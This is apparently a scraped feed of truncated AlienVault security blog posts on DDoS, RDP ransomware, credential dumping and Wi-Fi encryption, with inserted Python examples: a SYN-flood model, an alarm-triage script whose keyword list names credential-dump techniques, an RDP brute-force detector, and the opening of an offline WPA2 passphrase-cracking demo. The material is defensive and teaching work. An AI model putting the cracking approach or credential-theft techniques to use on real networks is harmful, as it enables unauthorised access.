Destruction may seem like a strong word when dealing with security hacks. However, as you look closely, you may find that it’s an appropriate term. When you try to explain the kind of destruction caused by a data breach, where do you begin? The easiest place would be how much the data breach costs a company. After all, a dollar amount placed on such a scandal would make it easy to quantify how bad one breach is compared to another. However, data breaches go beyond losing companies’ money in the short term. They can also have long-term psychological impacts. Thanks to the internet, no one forgets anything anymore. Once people learn a company failed to take adequate security measures to protect their customers’ data, they won’t forget. There are many ways for companies to build cybersecurity policies. It may seem expensive right now, but the potential losses a business may suffer from a data breach make the cost of security measures look like a drop in the bucket. That loss of trust will become even more pronounced if the data breach was the result of something that should have easily been avoided. For example, in the Marriott case, hackers were able to gain access to millions of people’s private information because two employees’ login credentials were compromised. If just those two workers had taken better security measures, then the whole thing could have been avoided. That damage, combined with rebranding efforts to win back consumer trust, adds up. Data breaches can be prevented, and while security measures may seem unnecessary or expensive now, their cost pales in comparison to what a company has to deal with in the aftermath of a hack. 
Suddenly, it’s no longer millions ]]> 2020-07-14T11:00:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/the-damaging-impact-data-breaches-have-on-american-society-as-a-whole~The-damaging-impact-data-breaches-have-on-American-society-as-a-whole www.secnews.physaphae.fr/article.php?IdArticle=1803677 False Data Breach None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC DDoS attack prevention and protection explained
8.4 million DDoS attack attempts each year
DDoS costs U.S. organizations $10B each year
Average downtime from DDoS is 30 minutes, but some attacks can last for days at a time
Negative DDoS impact
The disruption of DDoS attacks can threaten business resilience on many fronts:
Customer experience: Customers cannot connect with company resources online via web site, mobile app, or email
Revenue streams: Downtime on retail sites or apps prevents purchases from going through
Employee productivity: Employees are unable to access email, VoIP, or online resources to get their work done
Brand reputation: The inability to absorb or repel DDoS attacks can garner bad press and make the world think less of your business
Key vulnerabilities for DDoS attacks
The typical DDoS attack tends to prey upon weaknesses in the way systems are designed to communicate rather than outright vulnerabilities in software code. For example, most volumetric DDoS attacks send an influx of traffic from all over the world to a specific target with the goal of completely saturating the bandwidth available on that system's network. In this case the exploited weakness is a lack of infrastructure capacity and resilience to absorb the flood of traffic.
SYN flood attack
In other instances, DDoS attackers seek out weaknesses in how protocols work or how they're configured in order to cause timeouts and crashes. 
The classic example here is the SYN flood attack, which overwhelms servers with half-open TCP connections. The attacker initiates a large number of connection requests without completing the TCP three-way handshake, filling the server's connection backlog with half-open entries so that there is no room left to fully open legitimate TCP connections. The weakness being exploited is the way the server allocates and retains state for half-open connection requests; mitigations such as SYN cookies avoid holding that state until the handshake completes. Cybercriminals can also take advantage of chinks in the communication armor at the application layer to carry out DDoS attacks. For example, with HTTP flood attacks, criminals take advantage of the inherent trust a web server may have in every request coming from a client browser. Without some means of telling malicious requests from legitimate ones, a web server exhausts itself trying to fulfill concentrated and voluminous requests for database calls or random content that come from attackers' botnets.
Exploring your DDoS defense options
As with any other type of cybersecurity defense, DDoS defense requires a layered approach. A sound DD]]> 2020-07-14T07:33:00+00:00 https://feeds.feedblitz.com/~/t/0/0/alienvault-blogs/~/https://cybersecurity.att.com/blogs/security-essentials/ddos-attack-prevention-protection-explained~DDoS-attack-prevention-and-protection-explained www.secnews.physaphae.fr/article.php?IdArticle=1803328 False Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Teaching kids skills to catch hackers and fix security risks at Cyber Discover 60% of children are using the internet for over forty hours a week. Many of these children are taking cybersecurity for granted because they simply aren’t aware of many of the digital security risks that come with online use. 
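Returning to the SYN flood described in the DDoS article above: the following is an added example (mine, not code from the original post) that models a listener's bounded SYN backlog, fills it with an attacker's never-completed handshakes, and then shows why a legitimate client cannot connect until the server stops storing per-SYN state. The SYN-cookie variant is deliberately simplified: a real implementation also encodes the MSS and a timestamp in the sequence number. The backlog size, addresses and the cookie secret are assumptions.

```python
"""Toy model of a TCP listener's SYN backlog under a SYN flood (added example)."""
import hashlib
import hmac
from dataclasses import dataclass, field

BACKLOG = 4  # assumed tiny backlog so the exhaustion is visible in a few packets


@dataclass
class Listener:
    """A server port that tracks half-open connections in a bounded backlog."""
    use_syn_cookies: bool = False
    backlog: int = BACKLOG
    secret: bytes = b"constructed-secret"          # assumed per-server cookie key
    half_open: dict = field(default_factory=dict)  # (src, sport) -> server ISN
    established: set = field(default_factory=set)
    dropped_syns: int = 0

    def _cookie(self, src, sport):
        # SYN cookie: the server ISN is a keyed hash of the peer's address, so no
        # state has to be stored until the client's ACK proves it is reachable.
        msg = f"{src}:{sport}".encode()
        digest = hmac.new(self.secret, msg, hashlib.sha256).digest()
        return int.from_bytes(digest[:4], "big")

    def on_syn(self, src, sport):
        """Handle a SYN. Returns the SYN-ACK's ISN, or None if the SYN was dropped."""
        if self.use_syn_cookies:
            return self._cookie(src, sport)          # stateless: always answers
        if len(self.half_open) >= self.backlog:
            self.dropped_syns += 1                  # backlog full: legitimate SYNs die here
            return None
        isn = self._cookie(src, sport)               # any ISN works; reuse the hash
        self.half_open[(src, sport)] = isn
        return isn

    def on_ack(self, src, sport, ack_isn):
        """Third step of the handshake. Returns True if the connection is established."""
        key = (src, sport)
        if self.use_syn_cookies:
            ok = ack_isn == self._cookie(src, sport)  # validate without stored state
        else:
            ok = self.half_open.pop(key, None) == ack_isn
        if ok:
            self.established.add(key)
        return ok


def run_scenario(use_syn_cookies, attacker_syns=50):
    """Attacker sends SYNs and never ACKs; then one legitimate client tries a full handshake."""
    srv = Listener(use_syn_cookies=use_syn_cookies)
    for i in range(attacker_syns):
        srv.on_syn("198.51.100.7", 40000 + i)       # constructed attacker address, never completes
    isn = srv.on_syn("203.0.113.5", 51234)          # constructed legitimate client
    connected = isn is not None and srv.on_ack("203.0.113.5", 51234, isn)
    return {
        "client_connected": connected,
        "half_open": len(srv.half_open),
        "dropped_syns": srv.dropped_syns,
    }


if __name__ == "__main__":
    print("no cookies  :", run_scenario(False))
    print("SYN cookies :", run_scenario(True))
```

Without cookies the attacker's first four SYNs fill the backlog and every later SYN, including the legitimate one, is dropped; with cookies nothing is stored, the legitimate handshake completes, and a forged ACK that does not carry the right cookie is rejected.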
This is why it is vitally important not only for parents to teach their children basic measures for staying safe online, but also for schools to make cybersecurity an essential part of their curriculum going forward to ensure that the next generation is properly aware of how to keep online security risks to a minimum. One example is the Cyber Discover virtual cyber school program, which teaches children, through games and lessons, how to fix web page security flaws, uncover trails that cybercriminals leave behind, and decrypt hacker codes. Students who grow up with strong foundations in these kinds of cybersecurity skills could later help fill the massive cybersecurity skills gap. In this article, we’ll take a look at the role of cybersecurity in education, what exactly this school is teaching the younger generation, and how it will impact the cybersecurity industry in the future.
The role of education in cybersecurity
Children may not use the internet to generate as much financial and personal data as adults do, but that doesn’t mean that their digital lives couldn’t harm them in some way. It also doesn’t mean that children are never targets for hackers and cybercriminals. This is why all children need to have a basic understanding of how to keep their data private and secure online, just like adults do. Using and rotating strong passwords, logging in with anonymous usernames, storing data in the cloud, and encrypting your network traffic when online are just a small handful of security hygiene measures that can go a long way toward keeping hackers and cybercriminals at bay. This is even more important since online criminals have been taking full advantage of the COVID-19 pandemic. Just as teaching children about reading and mathematics from a very young age will benefit them immensely later in life, so will teaching them about basic cybersecurity measures. 
This is why schools and educational institutions absolutely have a role to play in teaching children about online privacy principles to follow and security technologies to help keep them safe. That being said, while teaching children basic cybersecurity principles is certainly a good thing, it will only go so far, because it won’t teach students the actual skills needed to avoid security risks and keep hackers at bay. Instead, instructors need to actually model good cybersecurity behavior and incorporate it into the classroom. Since compu]]> 2020-07-13T11:00:00+00:00 https://feeds.feedblitz.com/~/630196969/0/alienvault-blogs~Teaching-kids-skills-to-catch-hackers-and-fix-security-risks-at-Cyber-Discover www.secnews.physaphae.fr/article.php?IdArticle=1801818 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Stories from the SOC - Credential Dumping AT&T Managed Threat Detection and Response customers.
Executive Summary
During the Investigation of a Suspicious Security Critical Event alarm, we discovered credentials had been dumped from the NTDS.dit, which is the database that stores Active Directory data, including password hashes for all users in the domain. With these hashes, an attacker can crack users’ passwords offline or use the hashes directly in pass-the-hash attacks, which allows them to act as any user on the domain, including the administrator. If an attacker gains access to an administrator account, the opportunities are endless. The team immediately dug deeper into the event and determined a username tied to the actions. In under an hour we had triaged this set of alarms, created the Investigation, and reached out to the customer in accordance with the Incident Response Plan (IRP) that was created in collaboration with the customer’s security team. 
Investigation
Initial Alarm Review
Indicators of Compromise (IOCs)
The initial alarm surfaced as a result of multiple alarms with the method of Azure Security Center alert over a short period of time.
Expanded investigation
Alarm Detail
We received 11 low severity alarms with a method of Azure Security Center Alert. Ten of the alarms indicated Domain Name System (DNS) scanning and were all internal traffic. More concerning was the eleventh alert, which indicated (by event name) that credentials had been dumped from the NTDS.dit file. The alarming source was a domain controller, which added credence to the alarm and reduced the likelihood this was a false positive.
Response
Building the investigation
With the action taken being undefined, I had to assume the credential dump completed successfully. In a best-case scenario, it meant an encrypted file of hashed passwords was sent to an unknown destination. At that point, I determined the Investigation would be escalated to a high severity. The next significant piece of information was contained in the event details, which thankfully picked up a username involved in this activity. This customer had just recently moved to 24x7 monitoring with the MTDR SOC, so we did not have a long history to compare activity from this username or validate that it had an admin role. An administrative role and action by the account would be the only valid business explanation for credential dumping activity. Given the username did exist on the customer’s network and the alarm was preceded by ten other Azure alarms, I inferred that the company was active on their cloud infrastructure and decided to lower the Investigation severity to medium. 
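The triage just described (a burst of low-severity cloud alerts, one of which names credential dumping on a domain controller, with the severity swinging on whether the attributed user is a known administrator) can be written down as a rule. The following is an added example, mine rather than the SOC's tooling: the alarm records, hostnames, usernames, domain-controller inventory and admin list are all constructed, and the policy it encodes (unknown user on a DC is high, known admin is medium pending confirmation under the IRP) is an assumption for illustration.

```python
"""Triage logic for a burst of alarms containing a credential-dump event (added example)."""
from collections import Counter

# Constructed alarm feed: ten internal DNS-scan alerts plus one credential-dump alert.
ALARMS = [
    {"method": "Azure Security Center Alert", "event": "DNS scanning",
     "source": "ws%02d.corp.example" % i, "dest": "10.0.0.53", "user": None, "severity": "low"}
    for i in range(10)
] + [
    {"method": "Azure Security Center Alert",
     "event": "Credentials dumped from NTDS.dit",
     "source": "dc01.corp.example", "dest": None, "user": "jsmith", "severity": "low"},
]

DOMAIN_CONTROLLERS = {"dc01.corp.example", "dc02.corp.example"}   # assumed asset inventory
KNOWN_ADMINS = {"dadmin"}                                           # assumed privileged accounts
CRED_ACCESS_KEYWORDS = ("ntds.dit", "credential", "lsass", "dcsync")


def is_credential_access(alarm):
    """True if the event name points at credential dumping (keyword match on the event name)."""
    return any(k in alarm["event"].lower() for k in CRED_ACCESS_KEYWORDS)


def score_alarm(alarm):
    """Escalate or de-escalate one alarm; returns (severity, reasons)."""
    reasons = []
    sev = alarm["severity"]
    if not is_credential_access(alarm):
        return sev, reasons
    sev = "high"
    reasons.append("credential access event")
    if alarm["source"] in DOMAIN_CONTROLLERS:
        reasons.append("source is a domain controller (not a likely false positive)")
    user = alarm["user"]
    if user is None:
        reasons.append("no user attributed; cannot validate as admin activity")
    elif user in KNOWN_ADMINS:
        sev = "medium"   # plausible admin task: confirm with the customer per the IRP
        reasons.append(f"user {user} is a known admin; confirm with customer per IRP")
    else:
        reasons.append(f"user {user} not in admin list; treat as possible compromise")
    return sev, reasons


def triage(alarms):
    """Group a burst of alarms and return event counts plus every severity change."""
    by_event = Counter(a["event"] for a in alarms)
    escalations = []
    for a in alarms:
        sev, reasons = score_alarm(a)
        if sev != a["severity"]:
            escalations.append({"event": a["event"], "source": a["source"], "user": a["user"],
                                "new_severity": sev, "reasons": reasons})
    return {"counts": dict(by_event), "escalations": escalations}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(ALARMS), indent=2))
```

The ten DNS-scan alarms stay at their original severity and only the NTDS.dit event is surfaced, with the reasons that should go into the investigation notes; the keyword list is deliberately short and would be extended with the event names your alert source actually emits.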
Customer interaction
Even though the alarm had originated as a low severity alarm, in under an hour we had triaged this set of alarms, created the Investigation, and made phone calls to the two points of contact in accordance with the Incident Response Plan (IRP) requirements for a medium severity investigation. The admins were very quick to respond and confirmed that this was valid admin activity. The administrator was conducting password strength checks against all user p]]> 2020-07-09T11:00:00+00:00 https://feeds.feedblitz.com/~/629858773/0/alienvault-blogs~Stories-from-the-SOC-Credential-Dumping www.secnews.physaphae.fr/article.php?IdArticle=1798506 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Ransomware attacks on the perimeter SamSam have continued to adopt a wider variety of skilled attacker tactics, including directly probing and exploiting external perimeter services. The FBI recently highlighted this trend in a public service announcement last month entitled “High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations”, which named perimeter attacks against the remote desktop protocol (RDP) as one of the primary methods of infection. As someone who works in the vulnerability scanning and penetration testing sphere, I can say that attacker tactics on the perimeter have dramatically improved since the earlier part of the decade with the combination of improved RDP brute forcing libraries in wide distribution, better open source intelligence gathering methods, and leaked credential databases available to help arm these tools. A recent Shodan query shows over 3.5 million exposed RDP services as of the writing of this blog post, and this number has actually trended upwards over the years, so this is not a problem going away anytime soon. 
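The credential-guessing wave described above leaves a recognisable trace on the target: a run of failed RDP logons (Windows event 4625 with logon type 10) from one source across many usernames, sometimes followed by a success (4624) for one of them. The following added example, mine and not from the original post, runs that detection over constructed events; the event tuples, source addresses, window and threshold are all assumptions, and a production version would read the same fields from the Security log.

```python
"""Spot RDP password guessing in Windows logon events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: (timestamp, event_id, logon_type, username, source_ip)
# 4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive (RDP)
EVENTS = [
    ("2020-07-08T02:00:00", 4625, 10, "administrator", "198.51.100.23"),
    ("2020-07-08T02:00:02", 4625, 10, "admin", "198.51.100.23"),
    ("2020-07-08T02:00:04", 4625, 10, "jsmith", "198.51.100.23"),
    ("2020-07-08T02:00:05", 4625, 10, "backup", "198.51.100.23"),
    ("2020-07-08T02:00:07", 4625, 10, "svc_sql", "198.51.100.23"),
    ("2020-07-08T02:00:09", 4624, 10, "svc_sql", "198.51.100.23"),  # success right after the burst
    ("2020-07-08T02:03:00", 4625, 10, "jdoe", "203.0.113.9"),        # one typo from a real user
    ("2020-07-08T02:03:10", 4624, 10, "jdoe", "203.0.113.9"),
    ("2020-07-08T02:05:00", 4625, 3, "svc_web", "10.0.0.15"),         # network logon, not RDP
]

FAIL_THRESHOLD = 5             # assumed: failures per source inside the window
WINDOW = timedelta(minutes=5)  # assumed sliding window


def parse(ev):
    ts, eid, ltype, user, ip = ev
    return {"ts": datetime.fromisoformat(ts), "id": eid, "type": ltype, "user": user, "ip": ip}


def detect_rdp_bruteforce(events, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return findings per source IP: a guessing burst, the usernames tried,
    and any RDP success from that source after the burst (the case to act on first)."""
    rdp = sorted((parse(e) for e in events if e[2] == 10), key=lambda e: e["ts"])
    fails = defaultdict(list)   # ip -> timestamps of failures still inside the window
    users = defaultdict(set)    # ip -> usernames tried
    findings = {}
    for e in rdp:
        ip = e["ip"]
        fails[ip] = [t for t in fails[ip] if e["ts"] - t <= window]  # expire old failures
        if e["id"] == 4625:
            fails[ip].append(e["ts"])
            users[ip].add(e["user"])
            if len(fails[ip]) >= threshold:
                findings.setdefault(ip, {"burst": True, "users": set(), "success_after_burst": None})
                findings[ip]["users"] = set(users[ip])
        elif e["id"] == 4624 and ip in findings:
            findings[ip]["success_after_burst"] = e["user"]
    return findings


if __name__ == "__main__":
    for ip, f in detect_rdp_bruteforce(EVENTS).items():
        print(ip, sorted(f["users"]), "success as:", f["success_after_burst"])
```

Note what the detection does not depend on: Network Level Authentication and patching change nothing here, because every attempt in the sample is a valid protocol exchange with a wrong (or finally right) password, which is the article's point about why removing RDP from the perimeter beats hardening it in place.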
The fact that the small to midsize organizations that tend to allow direct perimeter access to remote desktop also correlate strongly with the typical targets of ransomware campaigns makes the issue even more pressing. Some observations on what organizations can do:
1) While various methods of securing or enhancing the protections around RDP services exist, it's really best to ensure it's only accessible behind a VPN with strong security protections, such as multi-factor authentication. Sometimes companies fall into the habit of thinking that if remote desktop is patched against vectors like BlueKeep or has Network Level Authentication enabled, it's an effective control, but the most common wave of attacks simply targets weak or stolen credential sets, which these controls do little to mitigate. Focus on removing the RDP attack surface entirely from the perimeter.
2) Don't fall into the trap of assuming that RDP is the only attack surface that matters (even though it gets most of the hype). We've already seen heavy usage of JBoss-based exploits by ransomware attackers, and that will surely expand as the low-hanging fruit from the existing ransomware attack vectors becomes mined out. Security tools such as masscan can be retrofitted by attackers with new probes and payloads to rapidly scan for and target millions of potentially vulnerable systems. Any vulnerability which allows for code execution on externally facing network services, particularly on Windows systems, will be a primary candidate for this sort of attack vector.
3) Ensure you have a mechanism to ensure pr]]> 2020-07-08T11:00:00+00:00 https://feeds.feedblitz.com/~/629774273/0/alienvault-blogs~Ransomware-attacks-on-the-perimeter www.secnews.physaphae.fr/article.php?IdArticle=1796485 False Ransomware,Data Breach,Vulnerability None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Zero Trust security model explained: what is Zero Trust? 
2020-07-08T08:15:00+00:00 https://feeds.feedblitz.com/~/629765595/0/alienvault-blogs~Zero-Trust-security-model-explained-what-is-Zero-Trust www.secnews.physaphae.fr/article.php?IdArticle=1796395 False Tool,Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Vulnerability assessment steps, process explained 2020-07-08T08:07:00+00:00 https://feeds.feedblitz.com/~/629764315/0/alienvault-blogs~Vulnerability-assessment-steps-process-explained www.secnews.physaphae.fr/article.php?IdArticle=1796396 False Vulnerability,Threat,Patching None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Types of DDoS attacks explained 2020-07-08T07:33:00+00:00 https://feeds.feedblitz.com/~/629763915/0/alienvault-blogs~Types-of-DDoS-attacks-explained www.secnews.physaphae.fr/article.php?IdArticle=1796329 False Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Building security culture: How organizations can improve cybersecurity 70% of Americans conducting their banking primarily online, it’s easy to see that a lapse in judgment or ignorance of how to stay safe could have serious consequences for many. Unfortunately, sufficient cyber hygiene practices are rare. A recent survey by Avast revealed that 83% of Americans use weak passwords, meaning that a large portion of the country’s private information is within arm’s reach of a hacker. This spells trouble for businesses. If so few individuals can implement proper security protocols in their personal lives, how can businesses with hundreds or thousands of employees ensure that each of them will keep the company’s information safe? As they say: a set of loose lips can sink a ship — or in this case, leave a company’s data vulnerable to attack. A recent literature review by a research group at Royal Holloway, University of London looked into the factors that affect cybersecurity behaviors within organizations. 
They found that the key to an organization’s digital safety is fostering a robust security culture. While there’s no magic bullet that will instantly transform a poor security culture into a good one, there are specific actions that organizations can take to move them in the right direction. Here, we’ll take a look at what leads to a strong security culture and what companies can do to promote one. What is security culture? In general, security culture can be thought of as a series of security-related beliefs held by a group or organization and the behaviors that follow from those ideas. For example, a good security culture is one in which the organization as a whole believes in the importance of cybersecurity, uses secure invoicing software, and enforces policies on strong passwords. A poor security culture would be one in which the CEO decries cybersecurity practices as a waste of time and allows employees to send passwords via unencrypted email. Based on recent research, the factors that affect security culture can largely be divided into four main subcategories: compliance with company policy, intergroup dynamics, email behavior, and password behavior. How to improve compliance with company policy In this day and age, many organizations have some kind of company policy on cybersecurity best practices. However, merely having a policy doesn’t mean that employees will follow the rules. Unfortunately, it’s estimated that over half of all company security breaches are the direct result of an employee failing to adhere to company policy, not the lack of a strict policy in the first place. In many cases, these failures to comply occur because employees believe that the policies are simply guidelines, not hard rules. They will weigh the perceived rewards (typically convenience) and the consequences of their actions when deciding whether or not to comply. 
Despite the numerous]]> 2020-07-07T11:00:00+00:00 https://feeds.feedblitz.com/~/629690797/0/alienvault-blogs~Building-security-culture-How-organizations-can-improve-cybersecurity www.secnews.physaphae.fr/article.php?IdArticle=1794733 False Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Improving workflows to speed security implementation According to the website Cyberseek, there are around 22,000 available jobs in the LA area with a supply/demand ratio of 1.5. With a national average for all other positions at 4.9, you begin to see why staffing these roles can be a challenge.
Resource prioritization
So how can organizations cope with these natural limitations? The answer is resource prioritization, along with a healthy dose of operational improvements. By identifying areas where processes can be streamlined and understanding what the most significant risks are, organizations can begin to help protect their systems while staying within their constraints. This task is not quite as impossible as it seems. The first step is to make sure you understand the following components:
The goal of the organization
Responsibilities and operations of the target department
Any regulatory or internal requirements
Once you know those points, you can begin the actual work. The best way to find areas to improve processes is to work directly with the specific departments. While the focus of this blog is IT or security departments, this process can be used pretty much anywhere. Through a mixture of interviews and process documentation, you can begin to assemble a picture of how departments operate. The graphic below outlines the basic review and improvement cycle that can be employed when conducting this type of work. Later in this blog is a more in-depth multi-level strategy that can be employed later down the line, or immediately for companies that want to engage in a longer-term assessment and improvement cycle. 
As always, these steps can also be integrated into any existing review or audit procedures. Working with frontline employees is one of the most effective ways to understand what occurs in your organization. These employees will almost always be able to provide ideas or suggestions on how to improve workflow and general operations. All proposals should be reviewed for accuracy and effectiveness, but getting data straight from the source is a great way to develop actionable plans. It almost seems too simple to work. Can asking questions like "What can we do better" or "Where do we spend the most time" really lead to a better protected company? Of course! Freeing up your staff so they have more time to focus on security concerns is one of the most direct ways to combat the three-headed hydra introduced in the beginning. The hardest part of this process is finding the right employees and asking the right questions. When it comes to selecting the employee(s) you talk to, you must pick the ones responsible for the work in question. If, for instance, you wanted to streamline or improve the ticketing system, you should talk to the service desk staff and manager. The closer you get to the actual work being done, the more valuable the insight you gain. Belo]]> 2020-07-06T11:00:00+00:00 https://feeds.feedblitz.com/~/629620342/0/alienvault-blogs~Improving-workflows-to-speed-security-implementation www.secnews.physaphae.fr/article.php?IdArticle=1792648 False Threat,Guideline None 5.0000000000000000 AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Vulnerability management explained National Institute of Standards and Technology (NIST). At a high level, SCAP can be broken down into a few components:
Common vulnerabilities and exposures (CVE) – Each CVE identifier names one publicly disclosed vulnerability, so that scanners, advisories and patches can all refer to the same issue. 
Common configuration enumeration (CCE) – Each CCE identifier names a specific system security configuration issue; the CCE list is used to develop configuration guidance.
Common platform enumeration (CPE) – CPE is a standardized naming scheme for classes of applications, operating systems, and hardware devices in your environment. CPE names describe what a CVE or CCE applies to.
Common vulnerability scoring system (CVSS) – This scoring system assigns a severity score to each defined vulnerability and is used to prioritize remediation efforts and resources according to the threat. Base scores range from 0.0 to 10.0, with 10.0 being the most severe. Note that the base score measures technical severity, not the risk to your particular environment: exposure, exploit availability and the value of the affected asset still have to be factored into the priority.
Many public sources of vulnerability definitions exist, such as the National Vulnerability Database (NVD) or Microsoft’s security updates, and are freely available. Additionally, several vendors offer access to private vulnerability databases via paid subscription. Security conf]]> 2020-07-02T13:01:00+00:00 https://feeds.feedblitz.com/~/629371410/0/alienvault-blogs~Vulnerability-management-explained www.secnews.physaphae.fr/article.php?IdArticle=1785541 False Malware,Vulnerability,Threat,Patching None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC 3 Steps to better cybersecurity in touchless business solutions (Part 2 of 3) In Part 1 of this series, we covered the first step to better cybersecurity in touchless business solutions, which is to practice extra caution in cashless payment solutions. We continue by discussing the second step to improve cybersecurity for touchless systems, which is to increase protocols for cybersecurity and data privacy.
Heighten cybersecurity and data protection protocols
Amazon launched Amazon Go in 2016, a connected grocery store that promises no lines, no check-outs, and no registers. 
It uses what Amazon calls a “Just Walk Out” technology that integrates computer vision, deep learning algorithms, and sensor fusion, just like the technology in self-driving cars. Shoppers can just walk into an Amazon Go store, check in through the Amazon Go app on their phones, and shop. They can automatically check out by picking items off the shelf. The multiple sensors within the store record items the customer has taken out. The customer gets charged on their account with the store items through the app. In China, Jack Ma’s Alibaba has opened around 65 locations for its Hema Store that utilise robotic technology, online payment apps, and overhead conveyor belts to revolutionise shoppers’ experience. It’s a great mix of online and offline shopping, where customers physically go to a store, browse items they want to buy, and then scan products with their Alibaba app to get more product details or add the product to cart. Consumers can also choose to have the products delivered right to their homes, even within the next 30 minutes. Xenia and Aurus also aim to put the power of the POS (point of sale) in the pocket of their guests. They offer cashierless technology that provides a seamless shopping experience in furniture retail. In its app, you will see product details, purchase history, peer reviews, recommended items, and other additional information useful for guests. The consumer can start a cart from home, seamlessly shift to the offline store, and end the transaction through the instant cart to “paystation” transfers. Caper introduces self-directed check-out with their AI-powered shopping carts with image recognition and sensor fusion. These “Smart Carts” were launched in a couple of grocery stores in New York City in 2019. Instead of installing hardware and retrofitting the entire store, which not all businesses would be able to implement immediately, Caper works with simple software integration so shoppers can scan, pay, and go. 
Carts are connected to the store’s central POS system and can scan the grocery item barcode with no app download necessary. The system can]]> 2020-07-02T11:00:00+00:00 https://feeds.feedblitz.com/~/629364066/0/alienvault-blogs~Steps-to-better-cybersecurity-in-touchless-business-solutions-Part-of www.secnews.physaphae.fr/article.php?IdArticle=1785330 False Data Breach,Malware None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC New report: COVID-19 Threat Intelligence Insight from the Telco Security Alliance here. ]]> 2020-07-01T15:00:00+00:00 https://feeds.feedblitz.com/~/629296078/0/alienvault-blogs~New-report-COVID-Threat-Intelligence-Insight-from-the-Telco-Security-Alliance www.secnews.physaphae.fr/article.php?IdArticle=1783723 False Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Cybersecurity penetration testing explained 2020-06-30T11:43:00+00:00 https://feeds.feedblitz.com/~/629220148/0/alienvault-blogs~Cybersecurity-penetration-testing-explained www.secnews.physaphae.fr/article.php?IdArticle=1782771 False Malware,Vulnerability,Threat None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Ransomware observations news articles have been published detailing how cybercriminals are outsourcing vulnerability analysis of their malware. Think about that for a minute: criminal cyber threat organizations are now reaching a maturity level in their operations that has only been seen before in nation-state cyber operations. The reasons to perform Quality Assurance (QA) on malware are the same reasons to perform it on traditional applications: protecting one's investment. Companies writing software want to take steps to ensure that the product they bring to market does not contain vulnerabilities that could lead to public disclosure and, ultimately, revenue loss. 
A criminal group has the same reasons, but for the purpose of keeping its technology viable for as long as possible. A nation-state cyber organization, albeit with different goals and objectives, also conducts code analysis on its tools to protect its investment in time and money. The more sophisticated malware becomes, the more expensive it is to build and maintain. Starting around five years ago the cybercrime industry moved away from “in-house” development, and a cottage industry of services marketed explicitly towards criminal groups began. These services initially marketed themselves in hacker forums and on Tor-based websites, but the explosive growth has seen them begin advertising on the open internet, with ads placed with popular search engines. These are true cottage industries: small decentralized businesses often operated out of a residence. They perform services ranging from gaining initial access to the more traditional malware code development. Due to the amount of money collected through the use of ransomware over the last few years and cybercriminals’ projected annual earnings of $20 billion by 2021, we will continue to see growth in outsourced services focused exclusively on a criminal clientele. But as we see]]> 2020-06-30T11:00:00+00:00 https://feeds.feedblitz.com/~/629191126/0/alienvault-blogs~Ransomware-observations www.secnews.physaphae.fr/article.php?IdArticle=1781477 False Ransomware,Malware,Vulnerability,Threat,Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC WPA security explained: what is Wi-Fi Protected Access? VPN, which provides its own encryption. I would strongly recommend using a VPN when you use open WiFi, no matter what you’re doing. Then there’s encrypted WiFi. Encrypted WiFi turns all the data you upload and download into scrambled code that’s useless to a cyber attacker unless they crack the code or have a decryption key. 
As of 2020, there have been four technology standards for encrypted WiFi: WEP, WPA, WPA2, and WPA3. You will need a password (or, in enterprise mode, per-user credentials) in order to use an encrypted WiFi signal no matter which standard you use. But the newer a standard is, the better it is for your security. Let’s quickly run through the older standards until I get to the latest standard, WPA3.
Reviewing WEP and older standards
WEP stands for Wired Equivalent Privacy. It’s the oldest wireless encryption standard; it debuted in 1997-1999 and became commonly used by the early 2000s. Maybe WEP gave you “wired equivalent privacy” back in the day. But password cracking applications have improved a lot since then, as has the processing speed of devices that can be used to crack WEP. There are also easy exploits that can be used to acquire WEP keys without having to crack the encryption directly. Actually, I could run an app on my phone that could probably crack any WEP encryption within minutes. Don’t use WEP, it hasn’t been secure for over a decade now! A couple of years after WEP debuted, there were already concerns about how weak the standard was. So the WiFi Protected Access standard was developed, or WPA for short. The main weakness of WPA was that it was designed to use some of the same vulnerable technologies that WEP used. But that’s because WPA was designed so that devices that were made to use WEP could use the more secure WPA with a software update. WPA was a compromise made to improve upon WEP without people needing to buy new routers and computer components, to encourage adoption. So it was still worth implementing. WPA2 was launched in 2004. People and businesses with WEP devices would need to buy new WPA2-capable devices in order to use the improved encryption standard. Finally there was wireless encryption that lacked all of WEP’s major weaknesses. 
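Even with WEP's flaws gone, a WPA2-Personal (pre-shared key) network still stands or falls on its passphrase: the pairwise master key is derived from the passphrase with PBKDF2, and anyone who captures one four-way handshake can test candidate passphrases offline, with no further contact with the network. The following is an added example (mine, not from the original post) that builds a synthetic handshake with the real WPA2 key derivation (PBKDF2-SHA1 to PMK, 802.11 PRF-512 to PTK, HMAC-SHA1-128 MIC over the EAPOL frame) and then recovers the passphrase from a constructed wordlist. The SSID, MAC addresses, nonces, EAPOL bytes and wordlist are all made up, and the EAPOL frame is a placeholder rather than a faithfully encoded message 2. WPA3-Personal's SAE handshake was designed specifically so that a captured exchange gives an attacker nothing to test guesses against offline.

```python
"""Why WPA2-PSK security rests on the passphrase: offline dictionary attack on a
synthetic four-way handshake (added example; all handshake material is constructed)."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
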